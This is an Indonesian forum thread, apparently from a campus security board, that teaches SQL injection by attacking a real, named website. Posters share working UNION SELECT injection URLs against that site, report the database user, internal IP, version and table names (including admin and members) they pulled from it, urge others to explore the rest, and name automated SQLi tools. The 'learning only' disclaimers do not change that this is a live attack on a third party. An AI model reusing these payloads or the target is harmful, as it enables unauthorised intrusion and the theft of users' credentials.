Belajar SQL Injection yukk..

Ini contoh kasus SQL injection :

http://www.enterpriseacademy.co.uk/news_detail.php?ID=-15%20%20union%20select%201,2,3,4,5,6--

Yuk kita belajar bareng2

coklat wrote:Ini contoh kasus SQL injection :

http://www.enterpriseacademy.co.uk/news_detail.php?ID=-15%20%20union%20select%201,2,3,4,5,6--

Yuk kita belajar bareng2

terus penelasannya gmn mas..heheheheheh

SQL
injection adalah sebuah aksi hacking yang dilakukan di aplikasi client
dengan cara memodifikasi perintah SQL yang ada di memori aplikasi clien
dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya
menggunakan database untuk penyimpanan data.


biasanya support pada mysql versi 5
aplikasi memiliki bug SQL Injection salah satunya adalah menggunakan perintah
and+1=1--
seumpama browser menampilkan angka 2 & 3, dan angka inilah yang
sering disebut dengan angka ajaib, karna angka tersebut adalah letak
colomn dimana attacker bisa melakukan injeksi lebih lanjut.
sebagai contoh :
> untuk melihat user dan versi database nya
http://www.enterpriseacademy.co.uk/news_detail.php?ID=-15%20%20union%20select%201,user%28%29,version%28%29,4,5,6--

dan akhirnya qta bisa meng-explore semua isi database tersebut

bayangin aj klo isi tabelnya adalah username, password, bahkan CC
Tp inget UU IT ya, bisa jd kasus ntar

Dilarang merusak juga, buat pembelajaran doank

Silakan kakak2 yg laen sharing jg, maap klo ada yg salah. makhlum masih newbie

trus itu ne buk muncul kayak gini...



gimana penjelasanny itu????

nah tu kan dah keliatan
user database: enterpreseac --> enterpreseac@192.168.0.13
versi : 5.0.58

dg beberapa manipulasi pake sql sintax, qta bisa explore sampe jeroannya

database : enterpreseac
tabel:
admin
business_categories
document_upload
link_toplevel_category
links
members
newsevents
sub_categories

isinya diexplore sendiri ya

silakan dicoba, sambil jangan lupa nanya2 juga ke mbah google. tp untuk pembelajaran aj ya, jangan sampe merusak. awas tu UU IT

wah forum ini d penuhin cew2 cantik, mudah2an jadi kenyataan di kehidupan nyata... jadi kan lebis\h semangat k kampus

wew.... ini kan forum security,knp ada injek-injek an om??
hahaha

kan ada pepatah, klo pingin nangkep pencuri harus tau gmn ilmu mencurinya. Nah gmn qta bisa terapin security policy klo qta lom tau jenis serangannya termasuk caranya. itu cuma pendapat aku sih hehehe

aku jg masih belajar koq kakak, makanya judul threadnya "Belajar SQL Injection". pinginnya bisa share gt, termasuk pencegahannya. karena klo g salah ada yg buat judul PA tentang pencegahan SQL injection. Apalagi banyak kakak2 yg jago disini, ada jg dosen2 sapa tau ntar jadi nambah ilmu buat aku. Maklum masih newbie banget.

coklat wrote:kan ada pepatah, klo pingin nangkep pencuri harus tau gmn ilmu mencurinya. Nah gmn qta bisa terapin security policy klo qta lom tau jenis serangannya termasuk caranya. itu cuma pendapat aku sih hehehe

aku jg masih belajar koq kakak, makanya judul threadnya "Belajar SQL Injection". pinginnya bisa share gt, termasuk pencegahannya. karena klo g salah ada yg buat judul PA tentang pencegahan SQL injection. Apalagi banyak kakak2 yg jago disini, ada jg dosen2 sapa tau ntar jadi nambah ilmu buat aku. Maklum masih newbie banget.

hei coklat... dosen2 poltek ganteng2 lho...wkwkwkwkwkwkwk

make pangolin aje

Pangolin tu apa kakak?? Tool SQLi ya?? Ajarin dunk master lom pernah pake. Bisa dishare kakak biar forum qta tambah rame dan bermanfaat

Tp benernya thread aku ini pingin lebih menekankan ke konsep SQLi sendiri, biar qta ga cuma jadi tool kiddies, mungkin malah qta bisa buat toolnya sendiri.
Sebagai contoh :
http://www.enterpriseacademy.co.uk/news_detail.php?ID=-15%20%20union%20select%201,2,3,4,5,6--
Nah sbenernya fungsi angka 1,2,3,4,5,6 tu buat apa? apakah pasti selalu 1,2,3,4,5,6
dan lain2. termasuk buq SQLi tu seperti apa?

Untuk tool SQLi ada banyak koq, schemafuzz, joomla.py, dll.

Ayo master cesz, sharing dunx (mode merayu on )